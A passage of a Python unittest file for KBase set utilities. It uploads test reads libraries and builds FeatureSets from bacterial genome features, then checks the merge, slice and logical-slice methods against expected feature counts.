ReadsUtils(os.environ['SDK_CALLBACK_URL'])\n paired_end_ref = ru.upload_reads({'fwd_file': forward_file, 'rev_file': reverse_file,\n 'sequencing_tech': 'artificial reads',\n 'interleaved': 0, 'wsname': self.getWsName(),\n 'name': 'test-' + str(lib_i) + '.pe.reads'})['obj_ref']\n\n new_obj_info = self.getWsClient().get_object_info_new(\n {'objects': [{'ref': paired_end_ref}]})[0]\n\n # store it\n if not hasattr(self.__class__, 'pairedEndLibInfo_list'):\n self.__class__.pairedEndLibInfo_list = []\n self.__class__.pairedEndLibName_list = []\n for i in range(lib_i + 1):\n try:\n assigned = self.__class__.pairedEndLibInfo_list[i]\n except:\n self.__class__.pairedEndLibInfo_list.append(None)\n self.__class__.pairedEndLibName_list.append(None)\n\n self.__class__.pairedEndLibInfo_list[lib_i] = new_obj_info\n self.__class__.pairedEndLibName_list[lib_i] = read_lib_basename\n return new_obj_info\n\n # call this method to get the WS object info of a Single End Library Set (will\n # upload the example data if this is the first time the method is called during tests)\n def getSingleEndLib_SetInfo(self, read_libs_basename_list, refresh=False):\n if hasattr(self.__class__, 'singleEndLib_SetInfo'):\n try:\n info = self.__class__.singleEndLib_SetInfo\n if info != None:\n if refresh:\n self.__class__.singleEndLib_SetInfo = None\n else:\n return info\n except:\n pass\n\n # build items and save each SingleEndLib\n items = []\n for lib_i, read_lib_basename in enumerate(read_libs_basename_list):\n label = read_lib_basename\n lib_info = self.getSingleEndLibInfo(read_lib_basename, lib_i)\n lib_ref = str(lib_info[6]) + '/' + str(lib_info[0]) + '/' + str(lib_info[4])\n print(\"LIB_REF[\" + str(lib_i) + \"]: \" + lib_ref + \" \" + read_lib_basename) # DEBUG\n\n items.append({'ref': lib_ref,\n 'label': label\n # 'data_attachment': ,\n # 'info':\n })\n\n # save readsset\n desc = 'test ReadsSet'\n readsSet_obj = {'description': desc,\n 'items': items\n }\n name = 'TEST_READSET'\n\n new_obj_set_info = self.wsClient.save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSets.ReadsSet',\n 'data': readsSet_obj,\n 'name': name,\n 'meta': {},\n 'provenance': [\n {\n 'service': 'kb_SetUtilities',\n 'method': 'test_kb_SetUtilities'\n }\n ]\n }]\n })[0]\n\n # store it\n self.__class__.singleEndLib_SetInfo = new_obj_set_info\n return new_obj_set_info\n\n # call this method to get the WS object info of a Paired End Library Set (will\n # upload the example data if this is the first time the method is called during tests)\n def getPairedEndLib_SetInfo(self, read_libs_basename_list, refresh=False):\n if hasattr(self.__class__, 'pairedEndLib_SetInfo'):\n try:\n info = self.__class__.pairedEndLib_SetInfo\n if info != None:\n if refresh:\n self.__class__.pairedEndLib_SetInfo = None\n else:\n return info\n except:\n pass\n\n # build items and save each PairedEndLib\n items = []\n for lib_i, read_lib_basename in enumerate(read_libs_basename_list):\n label = read_lib_basename\n lib_info = self.getPairedEndLibInfo(read_lib_basename, lib_i)\n lib_ref = str(lib_info[6]) + '/' + str(lib_info[0]) + '/' + str(lib_info[4])\n lib_type = str(lib_info[2])\n print(\"LIB_REF[\" + str(lib_i) + \"]: \" + lib_ref + \" \" + read_lib_basename) # DEBUG\n print(\"LIB_TYPE[\" + str(lib_i) + \"]: \" + lib_type + \" \" + read_lib_basename) # DEBUG\n\n items.append({'ref': lib_ref,\n 'label': label\n # 'data_attachment': ,\n # 'info':\n })\n\n # save readsset\n desc = 'test ReadsSet'\n readsSet_obj = {'description': desc,\n 'items': items\n }\n name = 'TEST_READSET'\n\n new_obj_set_info = self.wsClient.save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSets.ReadsSet',\n 'data': readsSet_obj,\n 'name': name,\n 'meta': {},\n 'provenance': [\n {\n 'service': 'kb_SetUtilities',\n 'method': 'test_kb_SetUtilities'\n }\n ]\n }]\n })[0]\n\n # store it\n self.__class__.pairedEndLib_SetInfo = new_obj_set_info\n return new_obj_set_info\n\n ##############\n # UNIT TESTS #\n ##############\n\n #### test_KButil_Localize_FeatureSet():\n ##\n # SKIPPING unittest until method fully debugged and set to active in ui spec.json\n @unittest.skip(\"skipped test_KButil_Localize_FeatureSet()\") # uncomment to skip\n def test_KButil_Localize_FeatureSet_01(self):\n method = 'KButil_Localize_FeatureSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n public_refseq_WS = 'ReferenceDataManager'\n # public_refseq_WS = '19217'\n\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_name_0 = 'GCF_000287295.1'\n genome_name_1 = 'GCF_000287295.1'\n genome_name_2 = 'GCF_001439985.1'\n genome_name_3 = 'GCF_000022285.1'\n\n # genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0])\n genome_ref_0 = public_refseq_WS + '/' + genome_name_1\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0])\n # genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0])\n genome_ref_3 = public_refseq_WS + '/' + genome_name_3\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_features = 4\n\n # featureSet 1\n num_non_local_genomes = 2\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n featureSet_version_1 = int(featureSet_info[VERSION_I])\n\n # run method\n params = {\n 'workspace_name': self.getWsName(),\n 'input_ref': featureSet_ref_1\n }\n result = self.getImpl().KButil_Localize_FeatureSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output featureSet\n output_ref = featureSet_ref_1\n output_type = 'KBaseCollections.FeatureSet'\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(int(output_info[VERSION_I]), featureSet_version_1 + 1)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_features)\n pass\n\n #### test_KButil_Merge_FeatureSet_Collection_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Merge_FeatureSet_Collection_01()\") # uncomment to skip\n def test_KButil_Merge_FeatureSet_Collection_01(self):\n method = 'KButil_Merge_FeatureSet_Collection_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_merged_features = 4\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': [featureSet_ref_1, featureSet_ref_2],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Merge_FeatureSet_Collection(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = self.getWsClient().get_objects2(\n {'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_merged_features)\n pass\n\n #### test_KButil_Slice_FeatureSets_by_Genomes_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Slice_FeatureSets_by_Genomes_01()\") # uncomment to skip\n def test_KButil_Slice_FeatureSets_by_Genomes_01(self):\n method = 'KButil_Slice_FeatureSets_by_Genomes_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_sliced_features = 2\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n base_output_name = 'Slice_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_refs': [featureSet_ref_1],\n 'input_genome_refs': [genome_ref_0, genome_ref_2],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Slice_FeatureSets_by_Genomes(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_sliced_features)\n pass\n\n #### test_KButil_Slice_FeatureSets_by_Genomes_NULL_RESULT():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Slice_FeatureSets_by_Genomes_NULL_RESULT()\") # uncomment to skip\n def test_KButil_Slice_FeatureSets_by_Genomes_NULL_RESULT(self):\n method = 'KButil_Slice_FeatureSets_by_Genomes_NULL_RESULT'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_sliced_features = 0\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n base_output_name = 'Slice_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_refs': [featureSet_ref_1],\n 'input_genome_refs': [genome_ref_3],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Slice_FeatureSets_by_Genomes(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n # output_name = base_output_name\n # output_type = 'KBaseCollections.FeatureSet'\n # output_ref = self.getWsName()+'/'+output_name\n # info_list = self.getWsClient().get_object_info_new({'objects':[{'ref':output_ref}]})\n # self.assertEqual(len(info_list),1)\n # output_info = info_list[0]\n # self.assertEqual(output_info[1],output_name)\n # self.assertEqual(output_info[2].split('-')[0],output_type)\n # output_obj = self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n # self.assertEqual(len(output_obj['element_ordering']),num_sliced_features)\n pass\n\n #### test_KButil_Logical_Slice_Two_FeatureSets_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_FeatureSets_01()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_FeatureSets_01(self):\n method = 'KButil_Logical_Slice_Two_FeatureSets_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_3,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_3: [genome_ref_3],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n num_sliced_features = 2 # yesA_yes_B\n logical_operator = 'yesA_yesB'\n base_output_name = 'Slice_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_ref_A': featureSet_ref_1,\n 'input_featureSet_ref_B': featureSet_ref_2,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_FeatureSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_sliced_features)\n pass\n\n #### test_KButil_Logical_Slice_Two_FeatureSets_02():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_FeatureSets_02()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_FeatureSets_02(self):\n method = 'KButil_Logical_Slice_Two_FeatureSets_02'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_3,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_3: [genome_ref_3],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n num_sliced_features = 1 # yesA_noB\n logical_operator = 'yesA_noB'\n base_output_name = 'Slice_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_ref_A': featureSet_ref_1,\n 'input_featureSet_ref_B': featureSet_ref_2,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_FeatureSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_sliced_features)\n pass\n\n #### test_KButil_Logical_Slice_Two_FeatureSets_03():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_FeatureSets_03()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_FeatureSets_03(self):\n method = 'KButil_Logical_Slice_Two_FeatureSets_03'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_3,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_3: [genome_ref_3],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n num_sliced_features = 1 # noA_yesB\n logical_operator = 'noA_yesB'\n base_output_name = 'Slice_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_ref_A': featureSet_ref_1,\n 'input_featureSet_ref_B': featureSet_ref_2,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_FeatureSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = 